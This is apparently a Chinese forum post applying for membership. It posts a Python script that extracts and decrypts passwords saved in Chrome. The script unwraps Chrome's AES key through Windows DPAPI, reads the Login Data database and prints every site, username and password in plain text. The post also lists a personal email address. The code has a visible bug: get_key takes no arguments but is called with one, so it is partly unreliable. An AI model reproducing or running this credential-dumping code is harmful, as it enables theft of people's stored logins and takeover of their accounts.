|
吾爱游客
发表于 2023-2-8 15:40
1、申 请 I D:drlee00
2、个人邮箱:864890381@qq.com
3、原创技术文章
python破解 chrome 自动填充密码,代码如下
def get_key():
# 获取AES加解密秘钥
try:
path = 'D:/chrome_data/Local State'
with open(path, "r") as f:
local_state = f.read()
local_state = json.loads(local_state)
key = base64.b64decode(local_state["os_crypt"]["encrypted_key"])
# print('key ', key)
key = key[5:] # removing DPAPI
key = win32crypt.CryptUnprotectData(key, None, None, None, 0)[1]
print('key ', key)
return key
except Exception as e:
print("Exception ", e)
def decrypt_password(buff, key):
# 密码解密
"""
解密之前先了解chrome 使用的加密方式,使用的是AES-GCM加密
AES-GCM加密
AES.new(key, AES.MODE_GCM, iv)
:param key: 密钥。16, 24 or 32字符长度的字符串
:param mode: chrome使用MODE_GCM
:param iv(nonce): 随机值,和MD5的“加盐”有些类似,目的是防止同样的明文块,始终加密成同样的密文块
:return cipher加密对象
cipher.encrypt_and_digest(data)
:return cipher_data加密后的值,auth_tag用户标签
'v10' chrome 80以上版本前缀
数据拼接 v10 + iv + cipher_data + auth_tag
buff 示例 b'v10\x13\xa7"\x92\xb8\xd2\xec1\x18\xee!TT+\xe6\xe0\xb4\xe1\x0c-\'\xcb\xaaF\x1d\xea\t\xe6\xf1\xe2a >\x05\xbaQF\xbc0\x9f\\\xe8'
"""
try:
iv = buff[3:15]
# print('iv ', iv)
payload = buff[15:]
# print('payload ', payload)
cipher = AES.new(key, AES.MODE_GCM, iv)
decrypted_pass = cipher.decrypt(payload)
# print('decrypted_pass ', decrypted_pass)
# print('decrypted_pass[:-16] ', decrypted_pass[:-16])
decrypted_pass = decrypted_pass[:-16].decode('utf-8') # remove suffix bytes
print('decrypted_pass decode ', decrypted_pass)
return decrypted_pass
except Exception as e:
print("Probably saved password from Chrome version older than v80\n")
print(str(e))
return "Chrome < 80"
def get_logins():
key = get_key(path)
login_db = 'D:/chrome_data/default/Login Data'
conn = sqlite3.connect(login_db)
cursor = conn.cursor()
try:
sql_text = "SELECT origin_url, username_value, password_value, id FROM logins"
cursor.execute(sql_text)
for row in cursor.fetchall():
origin_url = row[0]
username_value = row[1]
encrypted_password = row[2]
id = row[3]
# print('encrypted_password ', encrypted_password)
decrypted_password = decrypt_password(encrypted_password, key)
print('decrypted_password ', decrypted_password)
# hex_string = bytes_to_hex_string(encrypted_password)
# print('hex_string ', hex_string)
# 打印密码
if len(encrypted_password) > 0:
print("origin_url: ", origin_url)
print("username_value : ", username_value)
print("decrypted_password: ", decrypted_password)
print('=========================================')
except Exception as e:
print('Exception ', e)
cursor.close()
conn.close()
if __name__ == '__main__':
get_logins()
|
|
发帖前要善用【论坛搜索】功能,那里可能会有你要找的答案或者已经有人发布过相同内容了,请勿重复发帖。 |
|
|
|
|